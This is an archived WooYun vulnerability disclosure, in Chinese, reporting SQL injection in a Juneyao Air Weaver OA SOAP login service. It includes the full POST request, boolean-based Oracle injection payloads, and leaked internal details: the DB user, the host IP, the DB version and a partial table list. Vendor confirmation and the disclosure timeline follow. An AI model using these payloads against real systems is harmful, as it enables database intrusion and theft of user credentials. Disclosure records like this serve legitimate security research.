乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-27: 细节已通知厂商并且等待厂商处理中 2016-05-30: 厂商已经确认,细节仅向厂商公开 2016-06-09: 细节向核心白帽子及相关领域专家公开 2016-06-19: 细节向普通白帽子公开 2016-06-29: 细节向实习白帽子公开 2016-07-14: 细节向公众公开
RT
#1 http://oa.juneyaoair.com//services/
#2 注入位置
POST http://oa.juneyaoair.com//services/MobileService HTTP/1.0SOAPAction: ""Content-Type: text/xml<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <checkUserLogin xmlns="webservices.services.weaver.com.cn"> <in0>1' or '1'='1</in0> <in1>1</in1> <in2>1</in2> </checkUserLogin> </SOAP-ENV:Body></SOAP-ENV:Envelope>
1' or '1'='1 结果为51' or '1'='2 结果为4#3 本地通过C#编写代码, 进行中转注入
#4 数据证明POC:
1' or (select sys_context('userenv','isdba') from dual)='FALSE' and '1'='1 True1' or (select sys_context('userenv','current_user') from dual)='OA' and '1'='1 TRUE1' or (select sys_context('userenv','db_name') from dual)='oanew' and '1'='1 TRUE1' or (select count(distinct(owner)) from sys.all_tables)=9 and '1'='1 TRUE
用户名:OA当前数据库: oanew主机名: OA1-SRV主机IP:172.20.21.41数据库版本: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
数据库
OA数据库共有2008个表POC:
1' or (select count(*) from sys.all_tables where owner='OA')=2008 and '1'='1
仅列出部分表
HPELEMENTSETTING----2016/5/26 14:48:15WORKFLOW_FORWARD----2016/5/26 14:48:18DOCCDANGEWFFIELD----2016/5/26 14:48:20DOCCHANGESETTING----2016/5/26 14:48:27PAGENEWSTEMPLATE----2016/5/26 14:48:28DOCCHANGERECEIVE----2016/5/26 14:48:31WORKTASK_MONITOR----2016/5/26 14:48:32WORKTASKSHARESET----2016/5/26 14:48:32WORKTASK_CODESET----2016/5/26 14:48:36WORKTASK_BACKLOG----2016/5/26 14:48:37WORKTASK_CODESEQ----2016/5/26 14:48:48VORKFLOW_DEPTABBR----2016/5/26 14:48:54WORKTASK_OPERATOR----2016/5/26 14:49:21CPTCAPITALCODESEQ----2016/5/26 14:49:24WORKTASK_TASKLIST----2016/5/26 14:49:25DOCCHANGEWORKFLOW----2016/5/26 14:49:26BILL_BOHAIEVECTION----2016/5/26 14:50:06DOCSUBCATFTPCONFIG----2016/5/26 14:50:10WORKFLOWXFIELDYEAR----2016/5/26 14:50:12WORKTASK_FIELDDICT----2016/5/26 14:50:12DOCSECCATFTPCONFIG----2016/5/26 14:50:18DOCCHANGERECEIVEWF----2016/5/26 14:50:23DOCHANDWRITTENCOLOR----2016/5/26 14:50:41XMLREPORT_SHAREINFO----2016/5/26 14:50:45CPTSEARCHDEFINITION----2016/5/26 14:50:49FAVOURITELASTACTIVE----2016/5/26 14:50:54DOCMAINCATFTPCONFIG----2016/5/26 14:50:57CPTCAPITALEQUIPMENT----2016/5/26 14:50:57DOCCHANGESENDDETAIL----2016/5/26 14:50:57WORKTASK_COD@DETAIL----2016/5/26 14:51:03WORKFLOW_CREATETASK----2016/5/26 14:51:06WORKFLOW_SUBCOMABBR----2016/5/26 14:51:08WORKTASKCREATESHARE----2016/5/26 14:51:08WORKTASK_TASKFIELD----2016/5/26 14:51:18WORKTASK_REQUESTLOG----2016/5/26 14:51:18WORKTASK_SELECTITEM----2016/5/26 14:51:21OFID----2016/5/26 14:51:22WORKFLOW_DEPTABBRDEF----2016/5/26 14:51:31DOCHANDWRITTENDETAIL----2016/5/26 14:51:32OUTERDATAWFSETDETAIL----2016/5/26 14:51:46OUTERDATAWFPERIODSET----2016/5/26 14:51:46OFUSER----2016/5/26 14:51:47WORKFLOW_TRACKDETAIL----2016/5/26 14:51:49WORKTASK_REQUESPBASE----2016/5/26 14:52:11WORKDLOW_SPECIALFIELD----2016/5/26 14:52:56MAILSIGN----2016/5/26 14:52:57OFVCARD----2016/5/26 14:53:02OFGRLUP----2016/5/26 14:53:12HRMORGGROUP----2016/5/26 14:53:36OFROSTER----2016/5/26 14:53:43WORKFLOW_SUBCOMABBRDEF----2016/5/26 14:53:49WORKFLOW_SUPSUBCOMABBR----2016/5/26 14:53:56SYSFAVOURITE_FAVOURITE----2016/5/26 14:53:56PAGENEWSTEMP@ATELAYOUT----2016/5/26 14:54:00WORKFLOW_CODESEQRECORD----2016/5/26 14:54:03OFPRIVATE----2016/5/26 14:54:31...
跑的太慢了, 不继续跑了, 后续可获得大量数据, OA系统的用户名、密码等...
已证明!
没什么用的东西, 就删掉吧
危害等级:中
漏洞Rank:10
确认时间:2016-05-30 08:43
漏洞确认,谢谢
暂无